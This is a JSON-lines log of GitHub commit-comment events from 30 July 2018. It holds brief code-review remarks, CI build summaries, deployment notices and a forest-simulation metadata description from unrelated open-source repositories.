{"id":"8039654210","type":"CommitCommentEvent","actor":{"login":"lotharsm"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":29892256,"position":12,"line":174,"path":"engines/mohawk/myst_stacks/menu.cpp","commit_id":"3a7f85971fd00e598eca357010b18314d890e28b","created_at":"2018-07-30T19:01:52Z","updated_at":"2018-07-30T19:01:52Z","author_association":"MEMBER","body":"Checking the current GoG version and verified with this code, I noticed that for the German release of Myst ME, the \"OPTIONEN\" button is cut off and only Shows \"OPTIONE\". Maybe there's not enough space reserved for it in the GUI?"}},"created_at":"2018-07-30T19:01:52Z"}
{"id":"8039655807","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892257,"position":376,"line":376,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T19:02:11Z","updated_at":"2018-07-30T19:02:11Z","author_association":"OWNER","body":"removing duplicate."}},"created_at":"2018-07-30T19:02:11Z"}
{"id":"8039656591","type":"CommitCommentEvent","actor":{"login":"papandreou"},"repo":{"name":"hapijs/joi"},"payload":{"comment":{"id":29892258,"position":null,"line":null,"path":null,"commit_id":"02dc91a8d19815c41c46831cc708a0ea48752422","created_at":"2018-07-30T19:02:21Z","updated_at":"2018-07-30T19:02:21Z","author_association":"NONE","body":"Thanks :)"}},"created_at":"2018-07-30T19:02:21Z"}
{"id":"8039662235","type":"CommitCommentEvent","actor":{"login":"thuehn"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29892263,"position":null,"line":null,"path":null,"commit_id":"0264b90152ea95b5d22062a9a6d6185a39f8b467","created_at":"2018-07-30T19:03:30Z","updated_at":"2018-07-30T19:03:30Z","author_association":"CONTRIBUTOR","body":"seems like a good PR is already in the pipe for this issue:\r\nhttps://github.com/openwrt/packages/pull/6560/commits/664861af7e793593f7a92ebb861262d16e3d4317 "}},"created_at":"2018-07-30T19:03:30Z"}
{"id":"8039662375","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892264,"position":317,"line":317,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T19:03:32Z","updated_at":"2018-07-30T19:03:32Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-30T19:03:32Z"}
{"id":"8039663275","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29892265,"position":15,"line":15,"path":"Lesson_6/lib/validation.rb","commit_id":"4b73b09716a02c155bba385b979daaa7e24aec14","created_at":"2018-07-30T19:03:43Z","updated_at":"2018-07-30T19:03:43Z","author_association":"NONE","body":"вынести валидации для всех классов в один модуль и вызывать их с проверкой класса - не очень верная идея\r\nобычно либо пишут валидации в том классе, где они вызываются\r\nлибо пишут универсальный код (с использованием метапрограммирования), который может быть вызыван в любом классе (такое задание будет в последней теме курса)\r\n\r\nпричин здесь несколько\r\nнапример:\r\n1. если вдруг какой-то из классов поменяет имя, то править придется и в классе и в этом модуле, таких связанностей стараются избегать\r\n2. этот модуль \"знает обо всех классах\" , а \"всезнающих объектов\" также стараются избегать, потому что они нарушают \"принцип инкапсуляции\"\r\nесли изложить его совсем коротко и просто, то \"объекты должны знать друг о друге минимум\"\r\n\r\n"}},"created_at":"2018-07-30T19:03:43Z"}
{"id":"8039666402","type":"CommitCommentEvent","actor":{"login":"MCCXVMM"},"repo":{"name":"MCCXVMM/seattle-addict"},"payload":{"comment":{"id":29892276,"position":3,"line":3,"path":"client/src/UserProfile.js","commit_id":"c9159ee4b5522630c1c2827c73d032d757605c9a","created_at":"2018-07-30T19:04:24Z","updated_at":"2018-07-30T19:04:24Z","author_association":"OWNER","body":"Delete this"}},"created_at":"2018-07-30T19:04:24Z"}
{"id":"8039669242","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"mellery451/rippled"},"payload":{"comment":{"id":29892287,"position":null,"line":null,"path":null,"commit_id":"8236b707eba353508673736b42789f8c2e3453cc","created_at":"2018-07-30T19:04:59Z","updated_at":"2018-07-30T19:04:59Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/mellery451/rippled/commit/8236b707eba353508673736b42789f8c2e3453cc)\n\nBuilt at __20180730 - 19:04:59__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/msvc.Debug.txt) | 1031 cases, 0 failed, t: 564s | PASS :white_check_mark: \ngcc.Debug <br/>-Dcoverage=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/gcc.Debug_Dcoverage_ON.txt) | 1034 cases, 0 failed, t: 843s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/gcc.Release_Dassert_ON_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 933s | PASS :white_check_mark: \nclang.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/clang.Debug.txt) | 1034 cases, 0 failed, t: 275s | PASS :white_check_mark: \nmsvc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/msvc.Debug_NINJA_BUILD_true.txt) | 1031 cases, 0 failed, t: 596s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \ngcc.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/gcc.Debug.txt) | 1034 cases, 0 failed, t: 288s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/clang.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 734s | PASS :white_check_mark: \nclang.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/clang.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 396s | PASS :white_check_mark: \ngcc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/gcc.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 771s | PASS :white_check_mark: \nmsvc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/msvc.Debug_Dunity_OFF.txt) | 1027 cases, 0 failed, t: 1210s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/gcc.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 420s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/gcc.Debug_Dstatic_OFF.txt) | 1034 cases, 0 failed, t: 288s | PASS :white_check_mark: \ngcc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/gcc.Debug_NINJA_BUILD_true.txt) | 1034 cases, 0 failed, t: 262s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF -DBUILD_SHARED_LIBS=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/gcc.Debug_Dstatic_OFF_DBUILD_SHARED_LIBS_ON.txt) | 1034 cases, 0 failed, t: 293s | PASS :white_check_mark: \nmsvc.Release | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/msvc.Release.txt) | 1031 cases, 0 failed, t: 411s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=address, <br/>PARALLEL_TESTS=false, <br/>DEBUGGER=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/clang.Debug_Dunity_OFF_Dsan_address_PARALLEL_TESTS_false_DEBUGGER_false.txt) | 1030 cases, 0 failed, t: 1111s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=undefined, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-bldwerr/1//artifact/clang.Debug_Dunity_OFF_Dsan_undefined_PARALLEL_TESTS_false.txt) | 1030 cases, 0 failed, t: 1198s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-30T19:04:59Z"}
{"id":"8039672713","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892301,"position":92,"line":92,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T19:05:43Z","updated_at":"2018-07-30T19:05:43Z","author_association":"OWNER","body":"ok fixed."}},"created_at":"2018-07-30T19:05:43Z"}
{"id":"8039675219","type":"CommitCommentEvent","actor":{"login":"leleobhz"},"repo":{"name":"zerotier/ZeroTierOne"},"payload":{"comment":{"id":29892309,"position":null,"line":null,"path":null,"commit_id":"d724af6a99b3698bd396801f0b1ba64a5378fc94","created_at":"2018-07-30T19:06:13Z","updated_at":"2018-07-30T19:06:13Z","author_association":"NONE","body":"@glimberg  As we're talking in https://twitter.com/pqatsi/status/1023417121701875712 - do you mind if we find to Zerotier a ISP that meets what you need? Because as said in https://twitter.com/KurtKraut/status/1023991114955739136 - does not make any sense you change from Brazil to Argentina, since Brazil does host most of intercontinental cables and datacenter market here is the biggest in South America."}},"created_at":"2018-07-30T19:06:13Z"}
{"id":"8039677258","type":"CommitCommentEvent","actor":{"login":"marjoleinF"},"repo":{"name":"marjoleinF/pre"},"payload":{"comment":{"id":29892314,"position":null,"line":null,"path":null,"commit_id":"d118b574ba8504f9f4748419dee5ff5dde46e0ce","created_at":"2018-07-30T19:06:36Z","updated_at":"2018-07-30T19:06:36Z","author_association":"OWNER","body":"Thanks! Not necessary indeed, fixed now!"}},"created_at":"2018-07-30T19:06:36Z"}
{"id":"8039681403","type":"CommitCommentEvent","actor":{"login":"scundall"},"repo":{"name":"shopsys/shopsys"},"payload":{"comment":{"id":29892320,"position":21,"line":54,"path":"docker/conf/docker-compose-mac.yml.dist","commit_id":"e715d1dd26dd3ae46b7f23fd61854dbf9a6e9e77","created_at":"2018-07-30T19:07:25Z","updated_at":"2018-07-30T19:07:25Z","author_association":"NONE","body":"Možná bych zvážil použití limitů pro paměť a cpu (limit, resource) viz níže ... Čím dřív s tímto budete kalkulovat a uvidíte jak se vám to chová a můžete přizpůsobit\r\nEXAMPLE: \r\nservices:\r\n  node:\r\n    image: USER/You-Pre-Build-Image\r\n    environment:\r\n      - VIRTUAL_HOST=localhost\r\n    volumes:\r\n      - logs:/app/out/\r\n    command: [\"npm\",\"start\"]\r\n    cap_drop:\r\n      - NET_ADMIN\r\n      - SYS_ADMIN\r\n    deploy:\r\n      resources:\r\n        limits:\r\n          cpus: '0.001'\r\n          memory: 50M\r\n        reservations:\r\n          cpus: '0.0001'\r\n          memory: 20M"}},"created_at":"2018-07-30T19:07:25Z"}
{"id":"8039682106","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29892322,"position":25,"line":25,"path":"Lesson_6/lib/validation.rb","commit_id":"4b73b09716a02c155bba385b979daaa7e24aec14","created_at":"2018-07-30T19:07:33Z","updated_at":"2018-07-30T19:07:33Z","author_association":"NONE","body":"для класса Роут еще можно проверить что первая и последняя станция не совпадают"}},"created_at":"2018-07-30T19:07:33Z"}
{"id":"8039688660","type":"CommitCommentEvent","actor":{"login":"dennyzhang"},"repo":{"name":"pivotal-cf/fluent-bit-out-syslog"},"payload":{"comment":{"id":29892340,"position":3,"line":3,"path":".golangci.yml","commit_id":"848988cd2dd667528221a87116187fc5e547a0f6","created_at":"2018-07-30T19:08:48Z","updated_at":"2018-07-30T19:08:48Z","author_association":"CONTRIBUTOR","body":"@chentom88 & @wfernandes , what's gas linter?\r\n\r\nAny pointers?"}},"created_at":"2018-07-30T19:08:48Z"}
{"id":"8039690764","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892352,"position":83,"line":1631,"path":"tests/utils/utils.sh","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T19:09:12Z","updated_at":"2018-07-30T19:09:12Z","author_association":"NONE","body":"unnecessary, sorry for the confusion."}},"created_at":"2018-07-30T19:09:12Z"}
{"id":"8039693082","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892355,"position":103,"line":103,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T19:09:39Z","updated_at":"2018-07-30T19:09:39Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-30T19:09:39Z"}
{"id":"8039693629","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29892358,"position":21,"line":21,"path":"Lesson_6/lib/validation.rb","commit_id":"4b73b09716a02c155bba385b979daaa7e24aec14","created_at":"2018-07-30T19:09:45Z","updated_at":"2018-07-30T19:09:45Z","author_association":"NONE","body":"метод \"эмпти\" вызывается не у всех объектов, было бы логично предварительно проверить, что аттрибут \"нейм\" - строка... либо сделать это отделной валидацией, либо добавить вторую проверку в эту валидацию\r\n(первый вариант наверное правильней)"}},"created_at":"2018-07-30T19:09:45Z"}
{"id":"8039694933","type":"CommitCommentEvent","actor":{"login":"mhheise"},"repo":{"name":"lynx-json/jsua-style"},"payload":{"comment":{"id":29892361,"position":5,"line":111,"path":"test/mappers.js","commit_id":"a71a0513335dcf2bd12e287091050b85f002ed37","created_at":"2018-07-30T19:10:00Z","updated_at":"2018-07-30T19:10:00Z","author_association":"NONE","body":"This should be removed if we plan to merge this branch to `master`."}},"created_at":"2018-07-30T19:10:00Z"}
{"id":"8039695758","type":"CommitCommentEvent","actor":{"login":"Kevin-CodeCrew"},"repo":{"name":"cs-fullstack-fall-2018/javascript-day1-intro2-noobintheus"},"payload":{"comment":{"id":29892362,"position":null,"line":null,"path":null,"commit_id":"5362bbaeecd8bc25e8dac24f0b675a087cf44e46","created_at":"2018-07-30T19:10:10Z","updated_at":"2018-07-30T19:10:10Z","author_association":"CONTRIBUTOR","body":"Could find no JavaScript file for exercise 6 "}},"created_at":"2018-07-30T19:10:10Z"}
{"id":"8039696569","type":"CommitCommentEvent","actor":{"login":"rednoah"},"repo":{"name":"jlesage/docker-filebot"},"payload":{"comment":{"id":29892369,"position":33,"line":31,"path":"rootfs/opt/filebot/filebot","commit_id":"7c3d1c27b2b0039a32e7807f6bf6543f999f34dd","created_at":"2018-07-30T19:10:19Z","updated_at":"2018-07-30T19:10:19Z","author_association":"NONE","body":"I recommend using `-Dapplication.deployment=docker` since that's what I'm testing my docker [here](https://github.com/filebot/plugins/blob/master/docker/Dockerfile#L23) with as well."}},"created_at":"2018-07-30T19:10:19Z"}
{"id":"8039698193","type":"CommitCommentEvent","actor":{"login":"cjm23"},"repo":{"name":"LANDIS-II-Foundation/Project-Klamath-Climate-Fire"},"payload":{"comment":{"id":29892378,"position":null,"line":null,"path":null,"commit_id":"cf2cfadf6f5714815a70f483d0758510bcc4e392","created_at":"2018-07-30T19:10:37Z","updated_at":"2018-07-30T19:10:37Z","author_association":"NONE","body":"**LANDIS-II Metadata**\r\n**Tags**\r\nClimate Change, Simulation Modeling, Vegetation, Biomass, Fire, SW Oregon, NW California, 2015-2100\r\n**Summary**\r\nModel inputs to recreate the management scenario planning analysis, using LANDIS-II, for the Klamath-Siskiyou ecoregion.\r\n**Details**\r\n**Modelling Details**\r\nThe LANDIS-II model (http://www.landis-ii.org/home) simulates disturbance and forest dynamics among woody species under GCM climate projections.  LANDIS-II simulates forests as tree species-by-age cohorts within raster cells and incorporates spatial interactions across the landscape and among processes (e.g., management, growth and succession, and disturbance) over many decades.  \r\nThis modeling exercise utilized the following extensions: Net Ecosystem Carbon and Nitrogen (NECN) Succession (v4.2.1), Biomass Harvest (v3.2), Dynamic Fuels and Fire (v2.2.1), Dynamic Biomass Fuels (v4.0), Biomass Output (v2.2), Cohort Statistics Output (v2.2), and Biomass Reclassification Output (v2.2).  Original model parameterization for the fire and succession extensions were performed by Serra-Diaz et al. (2018).  \r\nThere were six management scenarios developed at two workshops held in Yreka, CA: 1) Business-as-usual (BAU), 2) Climate change adaptation (CCA), 3) Let-it-burn (LIB), 4) Privatization (PRIV), 5) Eco-restoration (Rx), and 6) Strategic fuels treatments (SFT).  The BAU strategy reflects generalized average management activities for the years 2010-2014 for this landscape.  Activities on USFS lands were based on data derived from the USFS FACTs database, and for BLM lands, data available through the BLM Medford office.  Activities on private lands were estimated from county level timber receipts.  CCA focused on adapting to climate change by a variety of means, including promoting oak/pine habitat, using fuels treatments, protecting legacy trees, and allowing fire-use fires.  The LIB strategy essentially stops management activity on federal lands, where there would be no harvesting or fire suppression.  The PRIV scenario imagined a hypothetical scenario where federal lands holdings were transferred to the public and that the forests were intensively managed for timber.  Rx, as a strategy, uses prescribed fire and fire-use fire as the main forms of restoration.  SFT uses roads and ridges fuel treatments, combined with fire-use fire, to change the forest.\r\nLANDIS-II utilizes climate data from the USGS (https://cida.usgs.gov/gdp/), and there were four climate projections from three different emissions pathways used in future projections: (1) ACCESS GCM from RCP 8.5 climate change scenario (hotter and drier than historical climate), (2) CanESM2 from RCP 8.5 (hotter and wetter), (3) CNRM from RCP 4.5 (warmer and wetter), and (4) MIROC5 from RCP 2.6 (warmer and drier).  As a baseline, a contemporary climate (1950-2010) was also used to generate data projections.  \r\n**Model Inputs**\r\n13 tree species, and 7 shrub types were modeled.  Specifics can be found in Species.txt.\r\nSlope and upaspect rasters derived from 30m NED.\r\nInitial communities derived from GNN data available from LEMMA (https://lemma.forestry.oregonstate.edu/data).\r\n**Model Outputs**\r\nAs currently configured, the outputs include:\r\n1)\tANPP and NEE estimates at 10-year intervals\r\n2)\tFire outputs: fuel types, time since last fire, severity, percent conifer/fir\r\n3)\tHarvest outputs: amount and prescription\r\n4)\tAnnual water budget at 10-year intervals\r\n5)\tBiomass by species at 10-year intervals\r\n6)\tForest cover type\r\n7)\tAge distributions by species at 20-year intervals\r\n**Other Details**\r\nSimulations were run on a 7.29 ha grid (270 m cell side) over 85 years (2015-2100).  \r\nModel input rasters were projected in Albers Equal Area, but model outputs have no projection information.\r\nAverage simulation replicate run time is ~28 hours.  Each run requires 1 cpu core, 8 GB of memory, and 3 GB of storage.    \r\nTo capture stochasticity of disturbance, each simulation and climate projection was replicated 10 times.\r\n**Point of Contact**\r\nPoint of contact: Charles Maxwell, cjmaxwe3@ncsu.edu, Department of Forestry and Environmental Resources, North Carolina State University\r\n**Use Limitations**\r\nThere are no planned updates for this time.  The data and product accuracy may vary due to compilation from various sources. This information may be updated, corrected, or otherwise modified without notification.\r\n"}},"created_at":"2018-07-30T19:10:37Z"}
{"id":"8039698247","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29892379,"position":null,"line":null,"path":null,"commit_id":"1bd5186f09ab7620b3790fcb8402ea27f0150f4c","created_at":"2018-07-30T19:10:37Z","updated_at":"2018-07-30T19:10:37Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-459](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-459).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-459-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-30T19:10:37Z"}
{"id":"8039700298","type":"CommitCommentEvent","actor":{"login":"rajsky123"},"repo":{"name":"rajsky123/Misc-Problems"},"payload":{"comment":{"id":29892388,"position":null,"line":null,"path":null,"commit_id":"30e50107e59e92e3985cefea6055a06c73955fed","created_at":"2018-07-30T19:10:59Z","updated_at":"2018-07-30T19:10:59Z","author_association":"OWNER","body":"BST Implementation"}},"created_at":"2018-07-30T19:10:59Z"}
{"id":"8039702816","type":"CommitCommentEvent","actor":{"login":"stonebig"},"repo":{"name":"altair-viz/altair"},"payload":{"comment":{"id":29892395,"position":null,"line":null,"path":null,"commit_id":"4d7078b78fe9201c8bf2ab0cb403ac73a32115e0","created_at":"2018-07-30T19:11:30Z","updated_at":"2018-07-30T19:11:30Z","author_association":"NONE","body":"can't wait for Waterfall chart. releasing soon ?"}},"created_at":"2018-07-30T19:11:30Z"}
{"id":"8039705529","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29892398,"position":null,"line":null,"path":null,"commit_id":"7a489923f43aa104a38047399fd699ba9ac160fa","created_at":"2018-07-30T19:12:01Z","updated_at":"2018-07-30T19:12:01Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1036](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1036).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1036-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-30T19:12:01Z"}
{"id":"8039706407","type":"CommitCommentEvent","actor":{"login":"cooktheryan"},"repo":{"name":"glennswest/hybrid"},"payload":{"comment":{"id":29892401,"position":null,"line":null,"path":null,"commit_id":"aa279e974faa7ec95087d9b95aec572872e353fc","created_at":"2018-07-30T19:12:11Z","updated_at":"2018-07-30T19:12:11Z","author_association":"NONE","body":"@glennswest this variable should be openshift_hostname\r\n\r\nhttps://docs.openshift.com/container-platform/3.9/install_config/install/advanced_install.html#configuring-host-variables"}},"created_at":"2018-07-30T19:12:11Z"}
{"id":"8039713478","type":"CommitCommentEvent","actor":{"login":"jdkanani"},"repo":{"name":"parsec-labs/solevm-truffle"},"payload":{"comment":{"id":29892418,"position":6,"line":234,"path":"contracts/EthereumRuntime.sol","commit_id":"5a7068171f888354e380d23c650015dcb484fc8f","created_at":"2018-07-30T19:13:30Z","updated_at":"2018-07-30T19:13:30Z","author_association":"NONE","body":"Even without these methods, I am getting OoG error! May be I am doing something wrong."}},"created_at":"2018-07-30T19:13:30Z"}
{"id":"8039715313","type":"CommitCommentEvent","actor":{"login":"trtmn"},"repo":{"name":"geniuslounge/metalink"},"payload":{"comment":{"id":29892422,"position":null,"line":null,"path":null,"commit_id":"ac1e9f64210ce4130954ba88606c9c25488e674e","created_at":"2018-07-30T19:13:51Z","updated_at":"2018-07-30T19:13:51Z","author_association":"COLLABORATOR","body":"Also allows for vanity name to show up in the RSS feed, if one exists for the user.\r\n"}},"created_at":"2018-07-30T19:13:51Z"}
{"id":"8039715741","type":"CommitCommentEvent","actor":{"login":"marjoleinF"},"repo":{"name":"marjoleinF/pre"},"payload":{"comment":{"id":29892423,"position":null,"line":null,"path":null,"commit_id":"1fb93e0e19151d763304c9e86563015f682f5f52","created_at":"2018-07-30T19:13:56Z","updated_at":"2018-07-30T19:13:56Z","author_association":"OWNER","body":"Thanks! Indeed, was not an issue with the merge. Was due to reloading survival package too many times, undoing earlier variable recoding."}},"created_at":"2018-07-30T19:13:56Z"}
{"id":"8039717229","type":"CommitCommentEvent","actor":{"login":"FreddieWitherden"},"repo":{"name":"vincentlab/PyFR"},"payload":{"comment":{"id":29892432,"position":9,"line":63,"path":"pyfr/integrators/dual/pseudo/multip.py","commit_id":"0f6cffef83b34a3d55f2ebb06721808690aeb635","created_at":"2018-07-30T19:14:13Z","updated_at":"2018-07-30T19:14:13Z","author_association":"MEMBER","body":"Might be able to simplify this as well given that there is no need to keep the cfg's we create around (we can construct them inside of the loop over self.levels)."}},"created_at":"2018-07-30T19:14:13Z"}
{"id":"8039717451","type":"CommitCommentEvent","actor":{"login":"FreddieWitherden"},"repo":{"name":"vincentlab/PyFR"},"payload":{"comment":{"id":29892434,"position":25,"line":79,"path":"pyfr/integrators/dual/pseudo/multip.py","commit_id":"0f6cffef83b34a3d55f2ebb06721808690aeb635","created_at":"2018-07-30T19:14:15Z","updated_at":"2018-07-30T19:14:15Z","author_association":"MEMBER","body":"Since we create the class directly we do not need this.  We can simply have\r\n\r\n```\r\nclass lpsint(cc, pc):\r\n    name = ...\r\n```"}},"created_at":"2018-07-30T19:14:15Z"}
{"id":"8039718511","type":"CommitCommentEvent","actor":{"login":"lindseybradford"},"repo":{"name":"lindseybradford/citizenry"},"payload":{"comment":{"id":29892438,"position":null,"line":null,"path":null,"commit_id":"7905afac3e01e9b093c921d18875c656aef1792d","created_at":"2018-07-30T19:14:28Z","updated_at":"2018-07-30T19:14:28Z","author_association":"OWNER","body":"Documenting the backstory:\r\n\r\nAfter the order is processed and the thank you page appears, the cart object is empty (makes sense, right?). With no data to pull from, our custom cart summary is empty. Because of this, we have to default back to the Shopify order summary table and hide our custom version.\r\n\r\n"}},"created_at":"2018-07-30T19:14:28Z"}
{"id":"8039722430","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29892456,"position":27,"line":27,"path":"Lesson_6/lib/validation.rb","commit_id":"4b73b09716a02c155bba385b979daaa7e24aec14","created_at":"2018-07-30T19:15:13Z","updated_at":"2018-07-30T19:15:13Z","author_association":"NONE","body":"проверка работы:\r\n```\r\n$ ruby main.rb \r\nВведите:\r\n1 - управление станциями\r\n2 - управление поездами\r\n3 - управление вагонами\r\n4 - управление маршрутами\r\nвыход - для выхода из приложения\r\n> 2\r\n===\r\nУправление поездами:\r\nВведите:\r\n1 - создать новый поезд\r\n2 - перейти к управлению станциями\r\n3 - назначить маршрут поезду\r\n4 - управление вагонами\r\n5 - переместить поезд по маршруту\r\n6 - открыть список станций и поездов\r\nвыход - для выхода из приложения\r\n> 1\r\nВведите номер нового поезда: 1122\r\nВведите:\r\n1 - пассажирский поезд\r\n2 - грузовой поезд\r\n1\r\nTraceback (most recent call last):\r\n\t13: from main.rb:4:in `<main>'\r\n\t12: from .../main_menu.rb:27:in `show_menu'\r\n\t11: from .../main_menu.rb:27:in `loop'\r\n\t10: from .../main_menu.rb:32:in `block in show_menu'\r\n\t 9: from .../main_menu.rb:84:in `trains_menu'\r\n\t 8: from .../main_menu.rb:84:in `loop'\r\n\t 7: from .../main_menu.rb:87:in `block in trains_menu'\r\n\t 6: from .../main_menu.rb:298:in `create_train'\r\n\t 5: from .../main_menu.rb:298:in `loop'\r\n\t 4: from .../main_menu.rb:303:in `block in create_train'\r\n\t 3: from .../main_menu.rb:314:in `create_train_by_type'\r\n\t 2: from .../main_menu.rb:314:in `loop'\r\n\t 1: from .../main_menu.rb:317:in `block in create_train_by_type'\r\n.../main_menu.rb:320:in `rescue in block in create_train_by_type': undefined local variable or method `invalid_train_message' for #<MainMenu:0x0000000001db8d90> (NameError)\r\nDid you mean?  invalid_train_number\r\n```\r\nнужно исправлять"}},"created_at":"2018-07-30T19:15:13Z"}
{"id":"8039723591","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29892463,"position":null,"line":null,"path":null,"commit_id":"d865e82ea3567cecaa6ab883063b4402e705b316","created_at":"2018-07-30T19:15:25Z","updated_at":"2018-07-30T19:15:25Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-301](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-301).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-301-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-30T19:15:25Z"}
{"id":"8039725970","type":"CommitCommentEvent","actor":{"login":"filippow"},"repo":{"name":"filippow/JS_loft"},"payload":{"comment":{"id":29892470,"position":null,"line":null,"path":null,"commit_id":"a0b99e5ddcc917cde638f8e2cb06f7da19a2985f","created_at":"2018-07-30T19:15:54Z","updated_at":"2018-07-30T19:15:54Z","author_association":"OWNER","body":"perfect"}},"created_at":"2018-07-30T19:15:54Z"}
{"id":"8039727192","type":"CommitCommentEvent","actor":{"login":"ajsnyde"},"repo":{"name":"CitiAngularTraining/StudyMaterials"},"payload":{"comment":{"id":29892473,"position":null,"line":null,"path":null,"commit_id":"e7c77c6a0373f53159228fdfa398e837029ec4af","created_at":"2018-07-30T19:16:08Z","updated_at":"2018-07-30T19:16:08Z","author_association":"NONE","body":"Cool stuff."}},"created_at":"2018-07-30T19:16:08Z"}
